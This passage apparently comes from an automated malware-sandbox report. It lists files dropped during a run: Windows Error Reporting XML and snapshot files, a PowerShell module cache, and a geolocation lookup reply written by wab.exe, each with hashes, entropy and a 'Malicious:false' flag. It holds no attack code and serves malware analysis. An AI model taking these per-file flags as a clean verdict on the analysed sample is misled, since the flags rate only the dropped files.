.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.2.<./.P.i.d.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.679908531407476
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJ/vq6YT6YBK6sJAgmfUBpxB89bNJsfCPm:R6lXJHq6YT6Y86sOgmfUwNifT
                                                      MD5:0D770D16D0F35D22A9053C42C96AE214
                                                      SHA1:0FE2B1629AAB6DAF02E107414FD186D1833D3124
                                                      SHA-256:95744C39E224D969EE04FDD07212E291BFC2784C946F4E254F8469D64A1686AD
                                                      SHA-512:4A1282083FFBBE86A12EF606F13B8198C7CA1C255B934C5B2E8CB8DFD7C17A4BBA9BE46A211FAEBEEDBC74F3F6E83F3947D2898AA709C25100CB4494D5D695BE
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.7.2.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.430873193422089
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VY1K5Ym8M4JTHFo+q87xUK27I3dB3d:uIjfKI7Jx7VnoJuIsk3dB3d
                                                      MD5:8158D1792C61C51EBCAE9003E223ACE8
                                                      SHA1:082B656C3125082689B4459E7EBA924E11119F26
                                                      SHA-256:B9581337BCE521A51A01BEB51E5210B0EFE20FE2EB80AECA7B16CDBBEA9E2D47
                                                      SHA-512:5BB25843BB0EB8289DC2A88A90C8494887075D832D1560F8D14B5D7EABEF58C1EB8397463B599522D9BFB7BB4080453C6BEBB10C6880328A7E4C1034721B8BA4
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.43070793309753
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VYoYm8M4JTHFY+q87I27I3dBdd:uIjfKI7Jx7VIJ68k3dBdd
                                                      MD5:C01C2818407CCBE0722208FBCA9929E3
                                                      SHA1:527C74F8390BE88A68019F661EBE2B80A50B6193
                                                      SHA-256:A52A95CC062CDCB3101233AF209197D4303BD3438EF761CC350EFA4C08C10CD5
                                                      SHA-512:C2D2FB0C896BD846A336FBB1FA41F2F9F5341601E9CEF8724EE655BB2341A970893B1FEEBE0704F0F72A7C0EBD05DC590E8BD222EA225CCE2A88B025FECF5445
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.677821736043687
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJqA6zg6YB16V7gmfUBpxr89b+esfjGqm:R6lXJ96zg6YD6pgmfUy+dfjC
                                                      MD5:B6E6B9FD368B9EA48EF5ED6BC0AE2955
                                                      SHA1:AFA5A56EE07625E622198FEE2C510C6944DC9BAB
                                                      SHA-256:5EFEA4BC449A5A1CB976B884B42599A167709A03CF64B132983FFB519CB7E55E
                                                      SHA-512:EBDD8E63928E50EDFD819A0C67940B84D51418E4D8014BD5E3702C790669095FCF127967594185EB2AE7DC5F72D7901E2E4CB9942E9DDF5D19F4F48DA21D56CC
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.1.2.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.430438215818508
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VYjYm8M4JTHFLf+q87en7I3dBxd:uIjfKI7Jx7V3JhfFk3dBxd
                                                      MD5:5DFBEE6C2E9ABCA54AA1C29B1EEF3733
                                                      SHA1:CEFA32121A35C4B5D40465437E88A30C35409650
                                                      SHA-256:04B3DBFFE1780E321D1688D4FCCD24D40E233258DAFB897698753DA3A0686C9E
                                                      SHA-512:27B9352FAF593AD695676F58AD8C28AAC70321E4C6C04886DC9C9B2F78B0C9E0530EBFDE4368758509997386005DD5CEB86AE28E15F79C08177B2714214DABF7
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.6800867693355417
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJCe6ig6YBV6FgmfUBpx189bxUsfR7m:R6lXJb6ig6Yj6FgmfUMxHfQ
                                                      MD5:72D3424222573B04032C429F91667046
                                                      SHA1:29C1D4A77E54EB80777C8D0317E294CAB1D8673D
                                                      SHA-256:727513E26AA32154CDC103A428DB99E6794913F3596FA4874E2472F0D86ADC22
                                                      SHA-512:C8E50E50B07E62D455754CCC153E249DDD42963BDD0546A4C21DA3E7B89B6EDC554AD05F1DCE56FF8ED02FDC9DB59FB27848D3F52DDE2E6EC0A675F7004D6947
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.0.8.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.681155915691615
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJCj6Ha56YBY6FgmfUBpxZ89bxhfsfr7m:R6lXJm6HU6YO6FgmfUoxhEf2
                                                      MD5:CD82A3F5255EACCF95AA264AEEF47FD4
                                                      SHA1:BD9B9F5D8C224225475A049BE90FCF5E4B242914
                                                      SHA-256:0C4785A9FCE37235ABFA1A72C4A044A6ACC429AE08294237DA6DBBF025788337
                                                      SHA-512:71154FE91FD5008AB307BB36ED07D4FAF82B8F52016C1B441EF9B727ADBFC8081798FFDD95D6C748452F6F3FB43AC60D561E8351FFFE3657E960304779EE5D91
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.5.2.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.432040121920472
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VY9Ym8M4JTHFZ+q87Y7I3dBYd:uIjfKI7Jx7VZJH1k3dBYd
                                                      MD5:6CE75B8FBD9CFDCC29601C2C5A20C498
                                                      SHA1:724DD9CC594C090E539F53B43100C3CC7A55F2D7
                                                      SHA-256:75A2162AC18EE0402F7A5AC9AE5281071E1E7C6DB5E8CC7479F47E20B9D07D14
                                                      SHA-512:13534A3D96CE7B834DA5A09C59F9CCC4DAE3DA10CD79D973773B99A21DDB3FF45D650BEB65E0200D101E7EE249011BAA134FFBD44BEAA02917A0BD6B6A6212E0
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.681832557171785
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJpI26aK6YBQ6pgmfUBpxu89bxrsfI7m:R6lXJpp6aK6Ym6pgmfUZxwfp
                                                      MD5:8A9607551498E81EE2D50D394231ABD2
                                                      SHA1:CD423A7CEA243041BC5D4A8DBC1047A0F49D6A25
                                                      SHA-256:EB6270C3EBFB31C7EDF206EC5C7494DF9044D2CDE8BC96045E9A9B189CA3828E
                                                      SHA-512:694C719A75F80D1D416B7FBC8D652C22289149A51FA6B405E7628C1E6FAFFD48780CAC42C579280286B9E6D862225076D2BC8DF75C6C91C4AB58CAE6273AF3D3
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.9.6.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.431137685970198
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VYLYm8M4JTHF++q87b7I3dByd:uIjfKI7Jx7VDJAik3dByd
                                                      MD5:97BF9B7587BE9E2918C189647C396BE0
                                                      SHA1:8666ABAFEFF711954C6DFE86F7C050030AF5EE26
                                                      SHA-256:F59029B95D9A7D7ECE4B297880853CE0A8EDBD84DD0B198F6089E3E08D94DF88
                                                      SHA-512:85140ADD992A98799602C9D9A639FC9274E3A3BD65D1DBDEFCE587D1691A7B5F374006AE223808CAF736A6B1B181751EDA20D08145D66DC50CCB941BAEDCB431
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):961
                                                      Entropy (8bit):5.00769637274414
                                                      Encrypted:false
                                                      SSDEEP:12:tkEQnd6CsGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7+:qPdRNuKyGX85JvXhNlT3/7SxDWro
                                                      MD5:BB19280E017D2F9A45F96479794EDA2B
                                                      SHA1:0B90C47DC19AE285F7F4BA6557174D29827BFE44
                                                      SHA-256:BA2C6ED473707347D40A4ED1B317325A0B78016A36B2A6A9DA43EB2CF63B9046
                                                      SHA-512:52B868D2AA5E0C867E7EA7D81A7113FF5B5B39068B4543D113691B39EDD05FD8A1D57F446FE62083247933C347698193CCB72A78732F7E3319736CD5326C6F63
                                                      Malicious:false
                                                      Preview:{. "geoplugin_request":"102.129.152.220",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):8003
                                                      Entropy (8bit):4.838950934453595
                                                      Encrypted:false
                                                      SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                      MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                      SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                      SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                      SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                      Malicious:false
                                                      Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2387787200195954
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIi+kXkkXfkuguWu0Q10Q0o0Qgl0QX40Qn0QfwNagWXQ+szeuzSzbxGQI5Uhms:pjle+ugrlooeyOkNKrF
                                                      MD5:E0FA4F7E2A5AEA2A18DEBBE8A352BE9E
                                                      SHA1:F2AD896B1401A0E70DB7FE8C6F2E1E4251D05B1F
                                                      SHA-256:444D5DF2BA8DAFF6ABC687C2F29F580C2111DC4B055F0C47C9368A104AD5E830
                                                      SHA-512:63C2C530F1AF7CFFB111A0F4C5937ADFCEF3AE20902320A8B20B56881A559EDD467BDA6A55ACC7975D1E721EDFC9094B8B0D55F383A69E2FEBE4D78BA162AB3E
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.8.8.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.7.3.7.4.1. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2378972684608756
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIitkXkkXfkuguWk0QN0Qz0QgW0QXr0QE0QJPrgjX5dszeuzSzbxGQI5UhmLsI:pgle+u0enoeyOkNKW
                                                      MD5:8FDEC79DBB1CC1ED113873375CFF78B3
                                                      SHA1:87127A0A05732E88ADB67344FAF2CE43C1E2349D
                                                      SHA-256:96BD311AFB80D7C63DF583CEC9EB23FB249AD2CE2B493A55BB38268592274F67
                                                      SHA-512:B7EA8E45C486D62EA9517C2EC42E5ECDDBF43DE17704C974EDFDE9AF469174181B85BD276A5FC43E19D93BC2AF397E7FA22468DB5E586D42B5A314D19ACD7A08
                                                      Malicious:false
